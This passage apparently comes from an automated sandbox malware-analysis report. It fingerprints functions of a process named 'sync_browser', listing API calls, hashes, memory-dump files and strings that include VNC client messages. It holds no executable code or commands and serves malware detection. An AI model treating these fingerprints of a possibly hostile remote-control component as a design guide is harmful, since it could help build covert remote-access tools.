                                                                        • Part of subcall function 00007FF7E5128C34: _errno.LIBCMT ref: 00007FF7E5128CAD
                                                                        • Part of subcall function 00007FF7E5128C34: _errno.LIBCMT ref: 00007FF7E5128CB8
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      • Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: _errno$AllocHeap_callnewhmalloc
                                                                      • String ID: ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/$VUUU$VUUU
                                                                      • API String ID: 908589684-1814909704
                                                                      • Opcode ID: 5345fd7311f357fadc130072c2608bf0beca503ebc7595e42aae47cd0f82b0d0
                                                                      • Instruction ID: 927bc7275fef82afcc3956f70bec45682dc70e6353230bb239ea6a98f8fa66cb
                                                                      • Opcode Fuzzy Hash: 5345fd7311f357fadc130072c2608bf0beca503ebc7595e42aae47cd0f82b0d0
                                                                      • Instruction Fuzzy Hash: 62218A32B0879946D390AB79A480738B7D1F744B90F885237EB9C87BC5DE39D142C710
                                                                      Function 00007FF7E5087650 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 79sleepCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • Sleep.KERNEL32 ref: 00007FF7E5087720
                                                                        • Part of subcall function 00007FF7E5087A30: SetEvent.KERNEL32(?,?,?,00007FF7E50876B4), ref: 00007FF7E5087A4B
                                                                        • Part of subcall function 00007FF7E5087A30: SetEvent.KERNEL32(?,?,?,00007FF7E50876B4), ref: 00007FF7E5087A55
                                                                        • Part of subcall function 00007FF7E5087A30: SetEvent.KERNEL32(?,?,?,00007FF7E50876B4), ref: 00007FF7E5087A5F
                                                                        • Part of subcall function 00007FF7E5087A30: InitializeCriticalSection.KERNEL32(?,?,?,00007FF7E50876B4), ref: 00007FF7E5087A8B
                                                                        • Part of subcall function 00007FF7E5087A30: InitializeCriticalSection.KERNEL32(?,?,?,00007FF7E50876B4), ref: 00007FF7E5087A95
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      • Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Event$CriticalInitializeSection$Sleepmalloc
                                                                      • String ID: keyEvent$start_event$stop_event
                                                                      • API String ID: 367317321-1979648887
                                                                      • Opcode ID: 4c2fb7a2e2a4829eb8b2e3fb3ca48f9c161a32c7fc48843e95e18382be6ac328
                                                                      • Instruction ID: c9921635e8621fa36aba13345df4d3c348ded53c458bd881828aeb4b84b889db
                                                                      • Opcode Fuzzy Hash: 4c2fb7a2e2a4829eb8b2e3fb3ca48f9c161a32c7fc48843e95e18382be6ac328
                                                                      • Instruction Fuzzy Hash: EF316C25E19B0B50FE51B724B4B2B75A791DF84F40F840036EA0E8B79ADE3DA454C372
                                                                      Function 00007FF7E50A5940 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 65COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      • Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: CriticalSection$EnterExceptionInitializeLeaveRaisemalloc
                                                                      • String ID: G
                                                                      • API String ID: 2834860089-985283518
                                                                      • Opcode ID: 163d903ced7c1d504fa84a9e51e7384b3b992433d33170fc57d78eaf579be50a
                                                                      • Instruction ID: bc08979c401bbf0639c33c501ddc210881e786cc8e8ddb086d6f709edc2c1e38
                                                                      • Opcode Fuzzy Hash: 163d903ced7c1d504fa84a9e51e7384b3b992433d33170fc57d78eaf579be50a
                                                                      • Instruction Fuzzy Hash: 41319B3251878586D710AF24E4503A9B3A4FF44FA4F940136E69987AD9CF7CD495C722
                                                                      Function 00007FF7E51299CC Relevance: 6.1, APIs: 4, Instructions: 65COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      • Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: _errno$_invalid_parameter_noinfo
                                                                      • String ID:
                                                                      • API String ID: 2819658684-0
                                                                      • Opcode ID: 859027ed417ea2719fff98fb652ef308f396c22346242a752418a20ea244bd4e
                                                                      • Instruction ID: 6f3e1e37fdfa11a82b950a58a70481e6dc6a0a4b160339ee28474a84bcfc49ff
                                                                      • Opcode Fuzzy Hash: 859027ed417ea2719fff98fb652ef308f396c22346242a752418a20ea244bd4e
                                                                      • Instruction Fuzzy Hash: 55218325A1D28B85FB11BB25782133DE294AF45FD0F844832E98DC7B89DE3CE4409722
                                                                      Function 00007FF7E507A290 Relevance: 6.1, APIs: 4, Instructions: 57comCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      • Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: CreateInitializeInstanceUninitialize
                                                                      • String ID:
                                                                      • API String ID: 948891078-0
                                                                      • Opcode ID: 5481b7ab5fc5c7fceea0fc204020ee9c7aeb27894877d551f4c9081dc7f6ea27
                                                                      • Instruction ID: b9686e5cdd2b7b5edab3d4cf12113f7cf2b99233be2f64b60c5bbdd91943bfd4
                                                                      • Opcode Fuzzy Hash: 5481b7ab5fc5c7fceea0fc204020ee9c7aeb27894877d551f4c9081dc7f6ea27
                                                                      • Instruction Fuzzy Hash: 16214F66618B4582E720AF29F46076AB3A0FB88F54F905132F69EC3B98DF3DD444CB11
                                                                      Function 00007FF7E50E1660 Relevance: 6.1, APIs: 4, Instructions: 51COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      • Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Global$FreeUnlock
                                                                      • String ID:
                                                                      • API String ID: 1239146723-0
                                                                      • Opcode ID: abdc864418634cf1197187ec179a29c8207377b801291dd9a7c0c602e8c7d055
                                                                      • Instruction ID: bb04e6293abcb4170dedc0b1816f61e4bdbb7e0b3f26d6247de3f5ac9dd3f711
                                                                      • Opcode Fuzzy Hash: abdc864418634cf1197187ec179a29c8207377b801291dd9a7c0c602e8c7d055
                                                                      • Instruction Fuzzy Hash: 36217431A19A4A81FB14AF22F860269B3A8FB84F84F541037E94DC7758DF7CD851CB62
                                                                      Function 00007FF7E50C3690 Relevance: 6.0, APIs: 4, Instructions: 47fileCOMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      • Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Write$ConsoleDebugFileHandleOutputString
                                                                      • String ID:
                                                                      • API String ID: 1934604790-0
                                                                      • Opcode ID: aa49c59b5da7e2634850ce4aacb17eb8463b37466091e8bd9ee96f81ef6cd0f2
                                                                      • Instruction ID: 59507148fd29636c7a0ed946ca03a371b6a51d94ae274bcfa48d2ded286744f0
                                                                      • Opcode Fuzzy Hash: aa49c59b5da7e2634850ce4aacb17eb8463b37466091e8bd9ee96f81ef6cd0f2
                                                                      • Instruction Fuzzy Hash: E311E225618A8440E710EB35A4143A9F760EB46FB4F584322EEBC43BD8CF3DC845C300
                                                                      Function 00007FF7E5134FA8 Relevance: 6.0, APIs: 4, Instructions: 45COMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      • Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: _amsg_exit$_getptd_lockfree
                                                                      • String ID:
                                                                      • API String ID: 2148533958-0
                                                                      • Opcode ID: 67261a7475787b32431de27056b085c578b22756a177dc977607e34beed0a1e5
                                                                      • Instruction ID: edee522093e40c98d235ff2c45542a10ff35180023045714ecad2fcf2d5f3bf8
                                                                      • Opcode Fuzzy Hash: 67261a7475787b32431de27056b085c578b22756a177dc977607e34beed0a1e5
                                                                      • Instruction Fuzzy Hash: 95113025A1964982EB94AB14F470379B360FB44F40F8A4037DA4D83799DF3CE451C763
                                                                      Function 00007FF7E50992C0 Relevance: 6.0, APIs: 1, Strings: 3, Instructions: 45COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • EnterCriticalSection.KERNEL32 ref: 00007FF7E50992F0
                                                                        • Part of subcall function 00007FF7E5107520: EnterCriticalSection.KERNEL32 ref: 00007FF7E5107534
                                                                        • Part of subcall function 00007FF7E5107520: ReleaseSemaphore.KERNEL32 ref: 00007FF7E5107577
                                                                        • Part of subcall function 00007FF7E5107520: GetLastError.KERNEL32 ref: 00007FF7E5107581
                                                                        • Part of subcall function 00007FF7E5107520: LeaveCriticalSection.KERNEL32 ref: 00007FF7E510758C
                                                                        • Part of subcall function 00007FF7E5107400: EnterCriticalSection.KERNEL32 ref: 00007FF7E5107427
                                                                        • Part of subcall function 00007FF7E5107400: LeaveCriticalSection.KERNEL32 ref: 00007FF7E5107472
                                                                        • Part of subcall function 00007FF7E5107400: LeaveCriticalSection.KERNEL32 ref: 00007FF7E510747B
                                                                        • Part of subcall function 00007FF7E5107400: WaitForSingleObject.KERNEL32 ref: 00007FF7E510748A
                                                                        • Part of subcall function 00007FF7E5107400: EnterCriticalSection.KERNEL32 ref: 00007FF7E5107495
                                                                        • Part of subcall function 00007FF7E5107400: GetLastError.KERNEL32 ref: 00007FF7E51074A7
                                                                        • Part of subcall function 00007FF7E5107400: EnterCriticalSection.KERNEL32 ref: 00007FF7E51074DE
                                                                        • Part of subcall function 00007FF7E5107400: LeaveCriticalSection.KERNEL32 ref: 00007FF7E5107500
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      • Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: CriticalSection$Enter$Leave$ErrorLast$ObjectReleaseSemaphoreSingleWait
                                                                      • String ID: b$vncclient.cpp : disable update thread$vncclient.cpp : enable/disable synced
                                                                      • API String ID: 1962697109-2518527632
                                                                      • Opcode ID: f543da9bb464de5584b1e5b02f7bc905784e8395ad55e1ed3b6c4c6bb991fdcf
                                                                      • Instruction ID: c741247b947cab85a00bf82d0c5e9841f18336532267a076409ceb970ac9653b
                                                                      • Opcode Fuzzy Hash: f543da9bb464de5584b1e5b02f7bc905784e8395ad55e1ed3b6c4c6bb991fdcf
                                                                      • Instruction Fuzzy Hash: C4115471608A8A85EB10AF25E4603E9A361FB84F54F844236E95DC77E9DF3CD405C722
                                                                      Function 00007FF7E51079A0 Relevance: 6.0, APIs: 4, Instructions: 45COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      • Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: CriticalSection$CreateEnterErrorExceptionLastLeaveRaiseSemaphore
                                                                      • String ID:
                                                                      • API String ID: 1747828912-0
                                                                      • Opcode ID: 14ac771c62f70bbc5ec8748b8740afadcc4c6e14281f3ec5920f493c53464439
                                                                      • Instruction ID: a472f029e1ea817e48e35eb6dc82ee45aa61e0f40de3fe69309fdc65a9d7e57a
                                                                      • Opcode Fuzzy Hash: 14ac771c62f70bbc5ec8748b8740afadcc4c6e14281f3ec5920f493c53464439
                                                                      • Instruction Fuzzy Hash: A711AC32A24B59A7E704AF25F5A0259B7A4FB48F80F50513BEB5983B58CF38E071CB11
                                                                      Function 00007FF7E5087960 Relevance: 6.0, APIs: 4, Instructions: 42COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      • Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: CriticalSection$DeleteEnterEventLeave
                                                                      • String ID:
                                                                      • API String ID: 3772564070-0
                                                                      • Opcode ID: 678031ac42c66a5cc385a0b69a6c3c5d1fab056847b98d7cff6dccc56ed1addc
                                                                      • Instruction ID: 1b8d0a67d922f6b7006f305729b7bf768d9506bb650d28b6e21380e1e98a456e
                                                                      • Opcode Fuzzy Hash: 678031ac42c66a5cc385a0b69a6c3c5d1fab056847b98d7cff6dccc56ed1addc
                                                                      • Instruction Fuzzy Hash: E021F725A19A0E91FB21AB11F864774A360EF88F44F844073CA4E867A88F3DA494C333
                                                                      Function 00007FF7E5107520 Relevance: 6.0, APIs: 4, Instructions: 39COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      • Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: CriticalSection$EnterErrorLastLeaveReleaseSemaphore
                                                                      • String ID:
                                                                      • API String ID: 540623443-0
                                                                      • Opcode ID: 1ef8894c349e896affc9970763aea91ebceedb24d96a9e68f30ae080b1782f5f
                                                                      • Instruction ID: 04d8c1e920920278fc5b57e0698aa8333eeae3f6b8fe17d683b3dbe7998ab06a
